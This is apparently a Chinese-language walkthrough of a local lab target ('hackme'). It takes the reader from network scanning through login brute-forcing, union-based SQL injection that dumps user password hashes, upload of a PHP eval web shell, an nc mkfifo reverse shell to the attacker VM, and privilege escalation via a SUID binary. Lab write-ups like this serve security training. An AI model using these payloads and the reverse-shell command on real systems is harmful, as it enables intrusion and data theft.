信息收集

  • 由于将 Kali 与 靶机在 VM 上使用 NAT 连接,所以使用 Kali 去扫描靶机。
  • 首先查看 Kali IP 地址:
1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[/opt/antsword]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.133  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::20c:29ff:fef8:7def  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:f8:7d:ef  txqueuelen 1000  (Ethernet)
        RX packets 21771  bytes 6035507 (5.7 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 21960  bytes 3882174 (3.7 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
  • 扫描当前网段,发现靶机 IP 地址:
1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[/opt/antsword]
└─# arp-scan 192.168.1.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:f8:7d:ef, IPv4: 192.168.1.133
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1     00:50:56:c0:00:08       VMware, Inc.
192.168.1.2     00:50:56:f2:24:22       VMware, Inc.
192.168.1.140   00:0c:29:23:07:8b       VMware, Inc.
192.168.1.254   00:50:56:f7:78:15       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.974 seconds (129.69 hosts/sec). 4 responded
  • 扫描开放端口:
1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[/opt/antsword]
└─# nmap -p- 192.168.1.140
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-16 08:38 EST
Nmap scan report for 192.168.1.140
Host is up (0.00065s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:23:07:8B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 18.25 seconds
  • 扫描端口对应服务:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kali)-[/opt/antsword]
└─# nmap -p 22,80 -sV 192.168.1.140  
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-16 08:40 EST
Nmap scan report for 192.168.1.140
Host is up (0.00060s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.34 ((Ubuntu))
MAC Address: 00:0C:29:23:07:8B (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.59 seconds
  • 扫描出 80 端口的 Web 服务,通常情况下不考虑 SSH 爆破,访问一下 Web 服务:

image-20231111104528299

暴力破解

  • 一个登陆框,通常来讲,现在有三种方式:

    • SQL注入 - 万能密码

    • 弱口令 - admin/123456

    • BurpSuite - 暴力破解

  • 注册一个账户进行测试,试一试万能密码:

1
2
' or 1 = 1 #
" or 1 = 1 #
  • 很明显不行,但是发现一个逻辑漏洞:

image-20231111104546614

  • 当账户不对时,会出现账号不存在,那就可以先找出账户。
  • 那就试一试账号:
1
2
3
admin
system
test

image-20231111104555107

  • 发现使用test测试时,出现错误的登录认证,说明 test 账户存在。
  • 那再试一试密码:
1
2
3
123456
admin@123
test@123
  • 简单测了一下都不行,BurpSuite 开跑:

image-20231111104602611

image-20231111104606705

  • 选中密码部分,加载自带的密码字典,开始跑:

image-20231111104613415

  • 选择报文长度排序,发现很多都可以,灰常奇怪,管他呢,经过尝试都能登录,成功进入后台:

image-20231111104622157

SQL 注入

  • 发现一个搜书的模块,点下 search 试试:

image-20231111104629407

  • 确实是搜书,这是这个框有可能出现 SQL 注入,手工测一测(firefox的hack有bug):
1
2
3
4
Linux OS # 正常,注意直接复制 Book Title 后面是跟着一个空格的,等会注入会有问题,而且 Title 必须打全
Linux OS' --  # 正常
Linux OS' and 1=1 -- # 正常
Linux OS' and 1=2 -- # 异常

image-20231111104651526

image-20231111104655699

  • 手工注入一下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
search=Linux OS' order by 3 # - 正常
search=Linux OS' order by 4 # - 错误

search=-Linux OS' union select 1,2,3 #
search=-Linux OS' union select 1,database(),3 #     webapphacking
search=-Linux OS' union select 1,group_concat(schema_name),3 from information_schema.schemata # 
    information_schema,mysql,performance_schema,sys,webapphacking
search=-Linux OS' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'webapphacking' #
    books,users
search=-Linux OS' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = 'webapphacking'and table_name = 'users' #
    id,user,pasword,name,address
search=-Linux OS' union select 1,group_concat(user,'-',pasword,'<hr/>'),3 from users #

user1-5d41402abc4b2a76b9719d911017c592
user2-6269c4f71a55b24bad0f0267d9be5508
user3-0f359740bd1cda994f8b55330c86d845
test-05a671c66aefea124cc08b76ea6d30bb
superadmin-2386acb2cf356944177746fc92523983
test1-05a671c66aefea124cc08b76ea6d30bb
  • 能手工注出来,SQLmap跑一下:
1
2
3
sqlmap -r url.txt -p search --batch

sqlmap -r url.txt -p search --batch -D webapphacking -T users -C user,pasword --dump

image-20231111104715724

image-20231111104719806

  • 管理员密码没跑出来,去网站解密一下:

image-20231111104725430

文件上传

  • 得出密码是 Uncrackable,那 superadmin/Uncrackable 去登录一下:

image-20231111104731255

  • 写个马上传一下:
1
<?php eval($_POST[v]);

image-20231111104741059

  • 发现文件上传成功了,并给出提示在 uploads 目录下,访问一下:

image-20231111104745259

  • 成功访问到了~

目录扫描

  • 这里如果没看见提示的话,可以使用工具扫一扫后台
  • 使用 feroxbuster 扫一扫:
1
feroxbuster -u http://192.168.1.140

image-20231111105652644

  • 访问一下,发现还存在有目录遍历漏洞:

image-20231111104758133

  • 使用 AntSword 连接一下:

image-20231111104802355

  • 连接成功!

NC 反弹

  • 由于 AntSword 自带的 Shell 不太友好,使用 NC 反弹一个出来:
1
2
3
4
5
# AntSword 上
rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.1.133 4444 >/tmp/f

# Kali 上
nc -lvvp 4444

image-20231111104817213

  • 成功反弹!

文件提权

  • 发现权限过低,找找提权:
1
2
3
4
www-data@hackme:/var/www/html/uploads$ cat /etc/passwd | grep /bin/bash
cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
hackme:x:1000:1000:hackme:/home/hackme:/bin/bash
  • 发现一个 hackme 用户,去家目录下看看:
1
2
3
4
5
6
7
8
www-data@hackme:/home$ ls
ls
hackme
legacy
www-data@hackme:/home$ cd hackme
cd hackme
www-data@hackme:/home/hackme$ ls
ls
  • 发现 hackme 的家目录下没东西,但是又发现一个 legacy 目录,再去看看:

image-20231111104828751

  • 发现一个有执行权限的二进制文件,运行一下:

image-20231111104833829

  • 提权成功!